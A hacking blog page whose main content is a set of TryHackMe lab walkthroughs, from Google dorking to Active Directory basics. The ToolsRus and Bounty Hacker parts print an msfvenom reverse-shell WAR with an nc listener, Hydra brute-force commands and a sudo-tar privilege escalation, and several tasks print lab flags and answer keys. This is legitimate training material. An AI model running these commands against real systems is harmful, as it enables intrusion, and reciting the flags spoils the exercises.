
ABOUT US

Our development agency is committed to providing you with the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are in every major security system; you just need to understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Technology is the best way to Change Everything, like Mindset Goal.

OUR SKILLS

We pride ourselves on strong, flexible and top-notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES


PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

  • TryHackMe Google Dorking Walkthrough







    Google is a very powerful search engine. Use this room to learn how to harness the power of Google.


    [Task 1] Ye Ol' Search Engine



    Google is arguably the most famous example of “Search Engines”, I mean who remembers Ask Jeeves? shudders


    Now it might be rather patronising explaining how these "Search Engines" work, but there's a lot more going on behind the scenes than what we see. More importantly, we can leverage this to our advantage to find all sorts of things that a wordlist wouldn't. Research as a whole - especially in the context of cybersecurity - encapsulates almost everything you do as a pentester. MuirlandOracle has created a fantastic room on learning the attitudes towards how to research, and what information you can gain from it exactly.


    "Search Engines" such as Google are huge indexers – specifically, indexers of content spread across the World Wide Web.


    These essentials in surfing the internet use “Crawlers” or “Spiders” to search for this content across the World Wide Web, which I will discuss in the next task.



    [Task 2] Let's Learn About Crawlers


    What are Crawlers and how do They Work?


    These crawlers discover content through various means. One is by pure discovery, where a URL is visited by the crawler and information regarding the content type of the website is returned to the search engine. In fact, there is a lot of information that modern crawlers scrape - but we will discuss how this is used later. Another method crawlers use to discover content is by following any and all URLs found on previously crawled websites, much like a virus in the sense that it will want to traverse/spread to everything it can.


    Let's Visualise Some Things...


    The diagram below is a high-level abstraction of how these web crawlers work. Once a web crawler discovers a domain such as mywebsite.com, it will index the entire contents of the domain, looking for keywords and other miscellaneous information - but I will discuss this miscellaneous information later.


















    In the diagram above, "mywebsite.com" has been scraped as having the keywords "Apple", "Banana" and "Pear". These keywords are stored in a dictionary by the crawler, which then returns these to the search engine, i.e. Google. Because of this persistence, Google now knows that the domain "mywebsite.com" has the keywords "Apple", "Banana" and "Pear". As only one website has been crawled, if a user was to search for "Apple"..."mywebsite.com" would appear. The same behaviour would result if the user was to search for "Banana": as the indexed contents from the crawler report the domain as having "Banana", it will be displayed to the user.











    As illustrated below, a user submits a query to the search engine of “Pears".
    Because the search engine only has the contents of one website that has been crawled with the keyword of “Pears” it will be the only domain that is presented to the user.




    However, as we previously mentioned, crawlers attempt to traverse, termed as crawling, every URL and file that they can find! Say if “mywebsite.com” had the same keywords as before (“Apple", “Banana” and “Pear”), but also had a URL to another website “anotherwebsite.com”, the crawler will then attempt to traverse everything on that URL (anotherwebsite.com) and retrieve the contents of everything within that domain respectively.



    This is illustrated in the diagram below. The crawler initially finds “mywebsite.com”, where it crawls the contents of the website - finding the same keywords (“Apple", “Banana” and “Pear”) as before, but it has additionally found an external URL. Once the crawler is complete on “mywebsite.com”, it'll proceed to crawl the contents of the website “anotherwebsite.com”, where the keywords ("Tomatoes", “Strawberries” and “Pineapples”) are found on it. The crawler's dictionary now contains the contents of both “mywebsite.com” and “anotherwebsite.com”, which is then stored and saved within the search engine.














    Recapping


    So to recap, the search engine now has knowledge of two domains that have been crawled:


    1. mywebsite.com
    2. anotherwebsite.com



    Although note that “anotherwebsite.com” was only crawled because it was referenced by the first domain “mywebsite.com”. Because of this reference, the search engine knows the following about the two domains:



    • Domain Name           Keyword
    • mywebsite.com          Apples
    • mywebsite.com        Bananas
    • mywebsite.com        Pears
    • anotherwebsite.com    Tomatoes
    • anotherwebsite.com    Strawberries
    • anotherwebsite.com    Pineapples



    Or as illustrated below:










    Now that the search engine has some knowledge about keywords, say if a user was to search for “Pears” the domain “mywebsite.com” will be displayed - as it is the only crawled domain containing "Pears":











    Likewise, say in this case the user now searches for "Strawberries". The domain "anotherwebsite.com" will be displayed, as it is the only domain that has been crawled by the search engine that contains the keyword "Strawberries":









    This is great...but imagine if a website had multiple external URLs (as they often do!). That would require a lot of crawling to take place. There's always the chance that another website might have similar information to one that has already been crawled - right? So how does the "Search Engine" decide on the hierarchy of the domains that are displayed to the user?






    In the diagram below in this instance, if the user was to search for a keyword such as "Tomatoes" (which websites 1-3 contain) who decides what website gets displayed in what order?








    A logical presumption would be that websites 1 through 3 would be displayed in that order...but that's not how real-world domains work and/or are named.


    So, who (or what) decides the hierarchy? Well...



    #1 Name the key term of what a "Crawler" is used to do








    Ans :- Index

     


    #2 What is the name of the technique that "Search Engines" use to retrieve this information about websites?



    Ans :- Crawling



    #3 What is an example of the type of contents that could be gathered from a website?


    Ans :- Keywords




    [Task 3] Enter: Search Engine Optimisation




    Search Engine Optimisation


    Search Engine Optimisation or SEO is a prevalent and lucrative topic in modern-day search engines. In fact, so much so, that entire businesses capitalise on improving a domain's SEO "ranking". At an abstract view, search engines will "prioritise" those domains that are easier to index. There are many factors in how "optimal" a domain is - resulting in something similar to a point-scoring system.


    To highlight a few influences on how these points are scored, factors such as:


    • How responsive your website is to the different browser types, i.e. Google Chrome, Firefox and Internet Explorer - this includes mobile phones!


    • How easy it is to crawl your website (or if crawling is even allowed ...but we'll come to this later) through the use of "Sitemaps"


    • What kind of keywords your website has (i.e. in our examples, if the user was to search for a query like "Colours", no domain will be returned - as the search engine has not (yet) crawled a domain that has any keywords to do with "Colours")


    There is a lot of complexity in how the various search engines individually "point-score" or rank these domains - including vast algorithms. Naturally, the companies running these search engines such as Google don't share exactly how the hierarchical view of domains ultimately ends up. Although, as these are businesses at the end of the day, you can pay to advertise/boost the order in which your domain is displayed.



    - Find a good example of how websites pay to boost their domains in the search listings -



    There are various online tools - sometimes provided by the search engine providers themselves that will show you just how optimised your domain is. For example, let's use SEO Site Checkup to check the rating of TryHackMe:


    According to this tool, TryHackMe is rated as 62/100 (as of 31/03/2020). That's not too bad and it'll show the justifications as to how this score was calculated below on the page.


    But...Who or What Regulates these "Crawlers"?



    Aside from the search engines that provide these "Crawlers", website/web-server owners themselves ultimately stipulate what content "Crawlers" can scrape. Search engines will want to retrieve everything from a website - but there are a few cases where we wouldn't want all of the contents of our website to be indexed! Can you think of any...? How about a secret administrator login page? We don't want everyone to be able to find that directory - especially through a Google search.




    Introducing Robots.txt...



     
    #1 Using the SEO Site Checkup tool on "tryhackme.com", does TryHackMe pass the “Meta Title Test”? (Yea / Nay)


    Ans :- Yea
     


    #2 Does "tryhackme.com" pass the “Keywords Usage Test?” (Yea / Nay)



    Ans :- Nay

     


    #3 Use https://neilpatel.com/seo-analyzer/ to analyse http://googledorking.cmnatic.co.uk:

    What "Page Score" does the Domain receive out of 100?





    Ans :-  85/100


    #4 With the same tool and domain in Question #3 (previous):

    How many pages use “flash”



    Ans :-  0


     

    #5 From a "rating score" perspective alone, what website would list first?

    tryhackme.com or googledorking.cmnatic.co.uk

    Use tryhackme.com's score of 62/100 as of 31/03/2020 for this question.



    Ans :- googledorking.cmnatic.co.uk



    [Task 4] Beepboop - Robots.txt



    Robots.txt



    Similar to "Sitemaps" which we will later discuss, this file is the first thing indexed by "Crawlers" when visiting a website.


    But what is it?



    This file must be served at the root directory - specified by the webserver itself. Looking at this file's extension of .txt, it's fairly safe to assume that it is a text file.



    The text file defines the permissions the "Crawler" has to the website. For example, what type of "Crawler" is allowed (i.e. you only want Google's "Crawler" to index your site and not MSN's). Moreover, Robots.txt can specify what files and directories we do or don't want to be indexed by the "Crawler".

    A very basic markup of a Robots.txt is like the following:
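    (The original screenshot doesn't survive in this text version; based on the keywords and the breakdown that follow - any crawler allowed, the whole site indexable, and a sitemap reference - a minimal robots.txt would be:)

    User-agent: *
    Allow: /

    Sitemap: http://mywebsite.com/sitemap.xml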









    Here we have a few keywords...


    • Keyword    Function
    • User-agent    Specify the type of "Crawler" that can index your site (the asterisk being a wildcard, allowing all "User-agents")
    • Allow    Specify the directories or file(s) that the "Crawler" can index
    • Disallow    Specify the directories or file(s) that the "Crawler" cannot index
    • Sitemap    Provide a reference to where the sitemap is located (improves SEO as previously discussed, we'll come to sitemaps in the next task)


     
    In this case:


    1. Any "Crawler" can index the site


    2. The "Crawler" is allowed to index the entire contents of the site


    3. The "Sitemap" is located at http://mywebsite.com/sitemap.xml



    Say we wanted to hide directories or files from a "Crawler"? Robots.txt works on a "blacklisting" basis. Essentially, unless told otherwise, the Crawler will index whatever it can find.
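    (The screenshot doesn't survive here; based on the description below - one fully disallowed directory plus a disallowed sub-directory - the file would look roughly like:)

    User-agent: *
    Disallow: /super-secret-directory/
    Disallow: /not-a-secret/but-this-is/

    Sitemap: http://mywebsite.com/sitemap.xml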








    In this case:

    1. Any "Crawler" can index the site



    2. The "Crawler" can index every other content that isn't contained within "/super-secret-directory/".


    Crawlers also know the differences between sub-directories, directories and files. Such as in the case of the second "Disallow:" ("/not-a-secret/but-this-is/")


    The "Crawler" will index all the contents within "/not-a-secret/", but will not index anything contained within the sub-directory "/but-this-is/".


    3. The "Sitemap" is located at http://mywebsite.com/sitemap.xml


    What if we Only Wanted Certain "Crawlers" to Index our Site?


    We can stipulate so, such as in the picture below:
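    (The screenshot doesn't survive here; matching the description below, the entries would be along these lines:)

    User-agent: Googlebot
    Allow: /

    User-agent: msnbot
    Disallow: /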




    In this case:



    1. The "Crawler" "Googlebot" is allowed to index the entire site ("Allow: /")

    2. The "Crawler" "msnbot" is not allowed to index the site (Disallow: /")



    How about Preventing Files From Being Indexed?


    Whilst you can make manual entries for every file extension that you don't want to be indexed, you will have to provide the directory it is within, as well as the full filename. Imagine if you had a huge site! What a pain...Here's where we can use a bit of regexing.
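    (The screenshot doesn't survive here; matching the description below, the file would look roughly like:)

    User-agent: *
    Disallow: /*.ini$

    Sitemap: http://mywebsite.com/sitemap.xml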







    In this case:


    1. Any "Crawler" can index the site


    2. However, the "Crawler" cannot index any file that has the extension of .ini within any directory/sub-directory of the site (the "$" anchors the rule to the end of the filename).


    3. The "Sitemap" is located at http://mywebsite.com/sitemap.xml


    Why would you want to hide a .ini file for example? Well, files like this contain sensitive configuration details. Can you think of any other file formats that might contain sensitive information?




    #1 Where would "robots.txt" be located on the domain "ablog.com"


    Ans :-  ablog.com/robots.txt



    #2 If a website was to have a sitemap, where would that be located?


    Ans :-  /sitemap.xml



    #3 How would we only allow "Bingbot" to index the website?


    Ans :- user-agent: Bingbot




    #4  How would we prevent a "Crawler" from indexing the directory "/dont-index-me/"?
     



    Ans :- Disallow: /dont-index-me/



    #5 What is the extension of a Unix/Linux system configuration file that we might want to hide from "Crawlers"?


    Ans :- .conf





    [Task 5] Sitemaps


    Sitemaps


    Comparable to geographical maps in real life, “Sitemaps” are just that - but for websites!

    “Sitemaps” are indicative resources that are helpful for crawlers, as they specify the necessary routes to find content on the domain. The below illustration is a good example of the structure of a website, and how it may look on a "Sitemap":









    The blue rectangles represent the route to nested content, similar to a directory, i.e. "Products" for a store. Whereas the green rounded rectangles represent an actual page. However, this is for illustration purposes only - "Sitemaps" don't look like this in the real world. They look more like this:









    “Sitemaps” are XML formatted. I won't explain the structure of this file-formatting as the room XXE created by falconfeast does a mighty fine job of this.
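    For illustration, a minimal sitemap in the standard sitemaps.org format looks something like this (the URLs are made-up examples):

    <?xml version="1.0" encoding="UTF-8"?>
    <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
      <url>
        <loc>http://mywebsite.com/</loc>
      </url>
      <url>
        <loc>http://mywebsite.com/products/</loc>
      </url>
    </urlset>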

    The presence of "Sitemaps" holds a fair amount of weight in influencing the "optimisation" and favorability of a website. As we discussed in the "Search Engine Optimisation" task, these maps make the traversal of content much easier for the crawler!


    Why are "Sitemaps" so Favourable for Search Engines?


    Search engines are lazy! Well, better yet - search engines have a lot of data to process. The efficiency of how this data is collected is paramount. Resources like "Sitemaps" are extremely helpful for "Crawlers" as the necessary routes to content are already provided! All the crawler has to do is scrape this content - rather than going through the process of manually finding and scraping. Think of it as using a wordlist to find files instead of randomly guessing their names!



    The easier a website is to "Crawl", the more optimised it is for the "Search Engine"




    #1 What is the typical file structure of a "Sitemap"?


    Ans :- XML



    #2 What real life example can "Sitemaps" be compared to?



    Ans :- Map



    #3 Name the keyword for the path taken for content on a website


    Ans :- Route





    [Task 6] What is Google Dorking?






    Using Google for Advanced Searching

    As we have previously discussed, Google has a lot of websites crawled and indexed. Your average Joe uses Google to look up cat pictures (I'm more of a dog person myself...). Whilst Google will have many cat pictures indexed ready to serve to Joe, this is a rather trivial use of the search engine in comparison to what it can be used for.
    For example, we can add operators like those found in programming languages to either increase or decrease our search results - or perform actions such as arithmetic!









    Say if we wanted to narrow down our search query, we can use quotation marks. Google will interpret everything in between these quotation marks as exact and only return the results of the exact phrase provided...Rather useful to filter through the rubbish that we don't need as we have done so below:








    Refining our Queries


    We can use terms such as "site" (such as bbc.co.uk) and a query (such as "gchq news") to search the specified site for the keyword we have provided, filtering out content that may be harder to find otherwise. For example, using the "site" term and query of "bbc" and "gchq", we have modified the order in which Google returns the results.

    In the screenshot below, searching for “gchq news” returns approximately 1,060,000 results from Google. The website that we want is ranked behind GCHQ's actual website:










    But we don't want that...We wanted “bbc.co.uk” first, so let's refine our search using the “site” term. Notice how in the screenshot below, Google returns with much fewer results? Additionally, the page that we didn't want has disappeared, leaving the site that we did actually want!
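    For reference, the refined query from the screenshots - combining the "site" term with the keywords - would be entered something like:

    site:bbc.co.uk gchq news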







    Of course, in this case, GCHQ is quite a topic of discussion - so there'll be a load of results regardless.



    So What Makes "Google Dorking" so Appealing?


    First of all - and the important part - it's legal! It's all indexed, publicly available information. However, what you do with this is where the question of legality comes in to play...


    A few common terms we can search and combine include:




    • Term    Action
    • filetype:
    •     Search for a file by its extension (e.g. PDF)
    • cache:    View Google's Cached version of a specified URL
    • intitle:    The specified phrase MUST appear in the title of the page




    For example, let's say we wanted to use Google to search for all PDFs on bbc.co.uk:



    site:bbc.co.uk filetype:pdf



     





    Great, now we've refined our search for Google to query for all publicly accessible PDFs on "bbc.co.uk" - you wouldn't have found files like this "Freedom of Information Request Act" file from a wordlist!


    Here we used the extension PDF, but can you think of any other file formats of a sensitive nature that may be publicly accessible? (Often unintentionally!!) Again, what you do with any results that you find is where the legality comes into play - this is why "Google Dorking" is so great/dangerous.


    Here is a simple directory traversal example.


    I have blanked out a lot of the below to cover you, me, THM and the owners of the domains:



     





    #1 What would be the format used to query the site bbc.co.uk about flood defences


    Ans :- site: bbc.co.uk flood defences


     

    #2 What term would you use to search by file type?


    Ans :-  filetype


     
    #3 What term can we use to look for login pages?

     

    Ans :-  intitle: login



     

     

    Disclaimer


    This was written for educational and pentesting purposes only.
    The author will not be responsible for any damage..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal..!


    All videos and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in are only for those who are interested in learning about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources; they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from becoming victims of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post - if you did, don't forget to share it.
    Thank you so much :-)




  • TryHackme ToolsRus Walkthrough






    Your challenge is to use the tools listed below to enumerate a server, gathering information along the way that will eventually lead to you taking over the machine.



    This task requires you to use the following tools:


    •     Dirbuster
    •     Hydra
    •     Nmap
    •     Nikto
    •     Metasploit





    1) What directory can you find, that begins with a g?


    gobuster dir -u http://10.10.194.132 -w /usr/share/dirbuster/wordlists/directory-list-1.0.txt -x php,txt,html



    Ans :-  Directory :- /guidelines
    Directory :- /protected



    2) Whose name can you find from this directory?



    http://10.10.194.132/guidelines/


    Ans :- username :- bob




    3) What directory has basic authentication?



    Ans :- protected





    4) What is bob's password to the protected part of the website?
    Generic Hydra syntax (example values from another target): hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp
     




    hydra -l bob -P /home/hackerboy/Documents/rockyou.txt 10.10.194.132 http-get "/protected"



    Ans :- password :-bubbles






    5) What other port that serves a web service is open on the machine?
    nmap -sC -sV -Pn 10.10.194.132




    Answer :- 1234






    6) Going to the service running on that port, what is the name and version of the software?
    Answer format: Full_name_of_service/Version




    nmap -sC -sV -Pn 10.10.194.132




    Answer :- Apache Tomcat/7.0.88





    7) Use Nikto with the credentials you have found and scan the /manager/html directory on the port found above.
    How many documentation files did Nikto identify?




    (After logging in - Bob's credentials work for us. Let's see what is inside the dashboard.)
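    The exact Nikto command isn't shown in the post; assuming Bob's credentials (bob:bubbles), the port from the next answer (1234) and Nikto's -id flag for host basic authentication, it would look something like:

    nikto -h http://10.10.194.132:1234/manager/html -id bob:bubbles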



    Answer :- 5





    8) What is the server version (run the scan against port 80)?
    nmap -sC -sV -Pn 10.10.194.132




    Answer :- Apache/2.4.18





    9) What version of Apache-Coyote is this service using?
    version of Apache-Coyote
     



    Answer :- 1.1




    10) Use Metasploit to exploit the service and get a shell on the system.
    What user did you get a shell as?
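    The Metasploit steps aren't shown here (the manual msfvenom route appears under question 11 below); assuming the Tomcat manager upload module with Bob's credentials and the port found earlier, a sketch would be:

    msfconsole
    use exploit/multi/http/tomcat_mgr_upload
    set RHOSTS 10.10.194.132
    set RPORT 1234
    set HttpUsername bob
    set HttpPassword bubbles
    set LHOST 10.8.61.234
    exploit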



    Answer :- root




    11) What text is in the file /root/flag.txt



    msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.8.61.234  LPORT=4444 -f war > shell.war

    then,
    10.8.61.234 :- it's the tunnel IP (check the tunnel IP in a terminal with "ip addr")

    log in and upload the shell (shell.war) through the Tomcat application manager


    nc -lvnp 4444




    whoami

    ls

    cat flag.txt



    Answer :- ff1fc4a81affcc7688cf89ae7dc6e0e1





    Video Tutorial :- Soon...

     






  • TryHackMe web fundamentals







    [Task 2] How do we load websites?



    Finding the server


    Initially, a DNS request is made. DNS is like a giant phone book that takes a URL (like https://tryhackme.com/) and turns it into an IP address. This means that people don't have to remember IP addresses for their favourite websites.

    The IP address uniquely identifies each internet-connected device, like a web server or your computer. These are formed of 4 groups of numbers, each 0-255 (x.x.x.x), with each group called an octet. An example shown below is 100.70.172.11.
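    You can perform this lookup yourself from a terminal; nslookup and dig are standard DNS tools, and the domain here is just an example:

    nslookup tryhackme.com
    dig +short tryhackme.com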


    Loading some content


    Once the browser knows the server's IP address, it can ask the server for the web page. This is done with a HTTP GET request. GET is an example of a HTTP verb, which are the different types of request (More on these later). The server will respond to the GET request with the web page content. If the web page is loading extra resources, like JavaScript, images, or CSS files, those will be retrieved in separate GET requests.






    Wireshark showing the HTTP requests that load a website (neverssl.com)




    For most websites now, these requests will use HTTPS. HTTPS is a secure (encrypted) version of HTTP; it works in more or less the same way. This uses TLS 1.3 (normally) encryption in order to communicate without:


       
    • Other parties being able to read the data
    • Other parties being able to modify the data



    Imagine if someone could modify a request to your bank to send money to your friend. That'd be disastrous!





    A web server is software that receives and responds to HTTP(S) requests. Popular examples are Apache, Nginx and Microsoft's IIS. By default, HTTP runs on port 80 and HTTPS runs on port 443. Many CTFs are based around websites, so it's useful to know that if port 80 is open, there's likely a web server listening that you can attack and exploit.


    The actual content of the web page is normally a combination of HTML, CSS and JavaScript. HTML defines the structure of the page, and the content. CSS allows you to change how the page looks and make it look fancy. JavaScript is a programming language that runs in the browser and allows you to make pages interactive or load extra content.




    #1 What request verb is used to retrieve page content?


    Ans :- GET


    #2 What port do web servers normally listen on?


    Ans :- 80


    #3 What's responsible for making websites look fancy?


    Ans :- CSS






    [Task 3] More HTTP - Verbs and request formats


    https://developer.mozilla.org/en-US/docs/Web/HTTP/Status



    Requests


    There are 9 different HTTP "verbs", also known as methods. Each one has a different function. We've mentioned GET requests already, these are used to retrieve content.


    POST requests are used to send data to a web server, like adding a comment or performing a login.


    There are several more verbs, but these aren't as commonly used for most web servers.


    A HTTP request can be broken down into parts. The first line is a verb and a path for the server, such as


    GET /index.html


    The next section is headers, which give the web server more information about your request. Importantly, cookies are sent in the request headers, more on those later.


    Finally, the body of the request. For POST requests, this is the content that's sent to the server. For GET requests, a body is allowed but will mostly be ignored by the server.


    Here's an example for a GET request retrieving a simple JS file:


    GET /main.js HTTP/1.1
    Host: 192.168.170.129:8081
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36
    Accept: */*
    Referer: http://192.168.170.129:8081/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8



    From the headers, you can tell what I performed the request with (Chrome version 80, from Windows 10). This is useful for forensics and analysing packet captures.


    Responses



    The server should reply with a response. The response follows a similar structure to the request, but the first line describes the status rather than a verb and a path.
    The status will normally be a code; you're probably already familiar with 404: Not Found.



    A basic breakdown of the status codes is:

    •     100-199: Information
    •     200-299: Successes (200 OK is the "normal" response for a GET)
    •     300-399: Redirects (the information you want is elsewhere)
    •     400-499: Client errors (You did something wrong, like asking for something that doesn't exist)
    •     500-599: Server errors (The server tried, but something went wrong on their side)



    You can find more information about these here: https://developer.mozilla.org/en-US/docs/Web/HTTP/Status


    Response headers can be very important. They can often tell you something about the web server sending them, or give you cookies that may prove useful later on.



    The response will also have a body. For GET requests, this is normally web content or information such as JSON. For POST requests, it may be a status message or similar.


    Here's a response to the GET request shown above:

    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Content-Length: 28
    Content-Type: application/javascript; charset=utf-8
    Last-Modified: Wed, 12 Feb 2020 12:51:44 GMT
    Date: Thu, 27 Feb 2020 21:47:30 GMT


    console.log("Hello, World!")




    #1 What verb would be used for a login?

    Ans :- POST




    #2 What verb would be used to see your bank balance once you're logged in?

    Ans :- GET


    #3 Does the body of a GET request matter? Yea/Nay
    Ans :- Nay



    #4 What's the status code for "I'm a teapot"?

    Ans :- 418




    #5 What status code will you get if you need to authenticate to access some content, and you're unauthenticated?

    Ans :- 401




    [Task 4] Cookies, tasty!


    What are cookies?



    Cookies are small bits of data that are stored in your browser. Each browser will store them separately, so cookies in Chrome won't be available in Firefox. They have a huge number of uses, but the most common are either session management or advertising (tracking cookies). Cookies are normally sent with every HTTP request made to a server.

    Why Cookies?



    Because HTTP is stateless (Each request is independent and no state is tracked internally), cookies are used to keep track of this. They allow sites to keep track of data like what items you have in your shopping cart, who you are, what you've done on the website and more.




    Cookies can be broken down into several parts. Cookies have a name, a value, an expiry date and a path. The name identifies the cookie, the value is where data is stored, the expiry date is when the browser will get rid of the cookie automatically and the path determines what requests the cookie will be sent with. Cookies are normally only sent with requests to the site that set them (Weird things happen with advertising/tracking).


    The server is normally what sets cookies, and these come in the response headers ("Set-Cookie"). Alternatively, these can be set from JavaScript inside your browser.
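    For example, a response header setting a session cookie might look something like this (the name, value and date are made up for illustration):

    Set-Cookie: session=a3fWa; Expires=Wed, 21 Oct 2020 07:28:00 GMT; Path=/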


    Using cookies



    When you log in to a web application, normally you are given a Session Token. This allows the web server to identify your requests from someone else's. Stealing someone else's session token can often allow you to impersonate them.

    Manipulating cookies



    Using your browser's developer tools, you can view and modify cookies. In Firefox, you can open the dev tools with F12. In the Storage tab, you can see cookies that the website has set. There's also a "+" button to allow you to create your own cookies which will come in handy in a minute. You can modify all cookies that you can see in this panel, as well as adding more.


    Alternatives - useful to know


    For some uses, LocalStorage and SessionStorage are slowly being used instead. These have similar functionality but aren't sent with HTTP requests by default. They are HTML5 features.


    More on cookies

    [Task 5] Mini CTF



    Time to put what you've learnt to use!


    Making HTTP requests

    You can make HTTP requests in many ways, including without browsers! For CTFs, you'll sometimes need to use cURL or a programming language as this allows you to automate repetitive tasks.

    Intro to cURL



    By default, cURL will perform GET requests on whatever URL you supply it, such as:

    curl https://tryhackme.com



    This would retrieve the main page for tryhackme with a GET request. Using command line flags for cURL, we can do a lot more than just GET content. The -X flag allows us to specify the request type, e.g. -X POST. You can specify the data to POST with --data, which will default to plain text data. It's worth mentioning that cURL does not store cookies, and you have to manually specify any cookies and values that you would like to send with your request. If you want to send cookies from cURL, you can look up how to do this.



    Remember, cookies are not shared between different browsers (I'm counting cURL as a browser here).



    Tasks


    There's a web server running on http://MACHINE_IP:8081. Connect to it and get the flags! (Example cURL commands for each task are sketched after this list.)
    •     GET request. Make a GET request to the web server with path /ctf/get
    •     POST request. Make a POST request with the body "flag_please" to /ctf/post
    •     Get a cookie. Make a GET request to /ctf/getcookie and check the cookie the server gives you
    •     Set a cookie. Set a cookie with name "flagpls" and value "flagpls" in your devtools and make a GET request to /ctf/sendcookie
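    Sketches of the cURL commands for each task (MACHINE_IP is the placeholder from the task; -i prints the response headers so you can see the cookie, and -b sends one):

    curl http://MACHINE_IP:8081/ctf/get
    curl -X POST --data "flag_please" http://MACHINE_IP:8081/ctf/post
    curl -i http://MACHINE_IP:8081/ctf/getcookie
    curl -b "flagpls=flagpls" http://MACHINE_IP:8081/ctf/sendcookie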


    #1 What's the GET flag?


    Ans :- thm{162520bec925bd7979e9ae65a725f99f}



    #2 What's the POST flag?

    Ans :- thm{3517c902e22def9c6e09b99a9040ba09}



    #3 What's the "Get a cookie" flag?

    Ans :- thm{91b1ac2606f36b935f465558213d7ebd}



    #4 What's the "Set a cookie" flag?


    Ans :- thm{c10b5cb7546f359d19c747db2d0f47b3}










  • TryHackMe Bounty Hacker Walkthrough






    Bounty Hacker


    You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!


    [Task 1] Living up to the title.


    1) Deploy the machine





    2) Find open ports on the machine

    Scan the IP address:



    nmap -A -Pn 10.10.247.118







    3) Who wrote the task list?


    ftp -A 10.10.247.118

    OR


    ftp -p 10.10.247.118


    OR


    ftp 10.10.247.118
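    The file retrieval isn't written out in the post; assuming anonymous FTP access and the two files the rest of the walkthrough relies on (the task list - called task.txt here, name assumed - and locks.txt, which the hydra command below uses), the session goes roughly:

    ftp 10.10.247.118
    (log in with the username "anonymous" and a blank password)
    ls
    get task.txt
    get locks.txt
    bye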







    Answer :- lin








    4) What service can you bruteforce with the text file found?



    Answer :- ssh




    5) What is the users password?


    hydra -l lin -P locks.txt 10.10.130.81 ssh


    OR


    hydra -l lin -P locks.txt 10.10.130.81 -t 4 ssh

    OR


    hydra -l lin -P locks.txt 10.10.130.81 -t 4 -e nsr ssh




    Answer :- RedDr4gonSynd1cat3








    6) user.txt



    Login with ssh


    ssh lin@10.10.247.118

    password :- RedDr4gonSynd1cat3


    whoami

    ls

    cd Desktop

    ls

    cat user.txt

    THM{CR1M3_SyNd1C4T3}


    Ans :- THM{CR1M3_SyNd1C4T3}

      

    7) root.txt


    go to this link https://gtfobins.github.io/


    and  search :-  tar


    and then,


    click on tar option


    and scroll down


    and copy this line


    Sudo


    It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on sudo.

      
     sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

    and paste it into the SSH session (lin's account) on the Bounty Hacker machine in the terminal

    and then, let's access

    # whoami

    root

    # cd /root

    # ls

    root.txt

    # cat root.txt

    THM{80UN7Y_h4cK3r}



    Ans :- THM{80UN7Y_h4cK3r}


     

     






  • Active Directory Basics TryHackMe Walkthrough






    Active Directory is the directory service for Windows Domain Networks. It is used by many of today's top companies and is a vital skill to comprehend when attacking Windows.


    It is recommended to have knowledge of basic network services, Windows, networking, and Powershell.


    The detail of specific uses and objects will be limited as this is only a general overview of Active Directory. For more information on a specific topic look for the corresponding room or do your own research on the topic.
     




    What is Active Directory? -



    Active Directory is a collection of machines and servers connected inside of domains, that are a collective part of a bigger forest of domains, that make up the Active Directory network. Active Directory contains many functioning bits and pieces, a majority of which we will be covering in the upcoming tasks. To outline what we'll be covering take a look over this list of Active Directory components and become familiar with the various pieces of Active Directory:



    •     Domain Controllers
    •     Forests, Trees, Domains
    •     Users + Groups
    •     Trusts
    •     Policies
    •     Domain Services


    All of these parts of Active Directory come together to make a big network of machines and servers. Now that we know what Active Directory is let's talk about the why?


    Why use Active Directory? -



    The majority of large companies use Active Directory because it allows for the control and monitoring of their user's computers through a single domain controller. It allows a single user to sign in to any computer on the active directory network and have access to his or her stored files and folders in the server, as well as the local storage on that machine. This allows for any user in the company to use any machine that the company owns, without having to set up multiple users on a machine. Active Directory does it all for you.



    [Task 2] Physical Active Directory



    The physical Active Directory is the servers and machines on-premise, these can be anything from domain controllers and storage servers to domain user machines; everything needed for an Active Directory environment besides the software.





    Domain Controllers -


    A domain controller is a Windows server that has Active Directory Domain Services (AD DS) installed and has been promoted to a domain controller in the forest. Domain controllers are the center of Active Directory -- they control the rest of the domain. I will outline the tasks of a domain controller below:



    •     holds the AD DS data store
    •     handles authentication and authorization services
    •     replicates updates from other domain controllers in the forest
    •     allows admin access to manage domain resources







    AD DS Data Store -


    The Active Directory Data Store holds the databases and processes needed to store and manage directory information such as users, groups, and services. Below is an outline of some of the contents and characteristics of the AD DS Data Store:


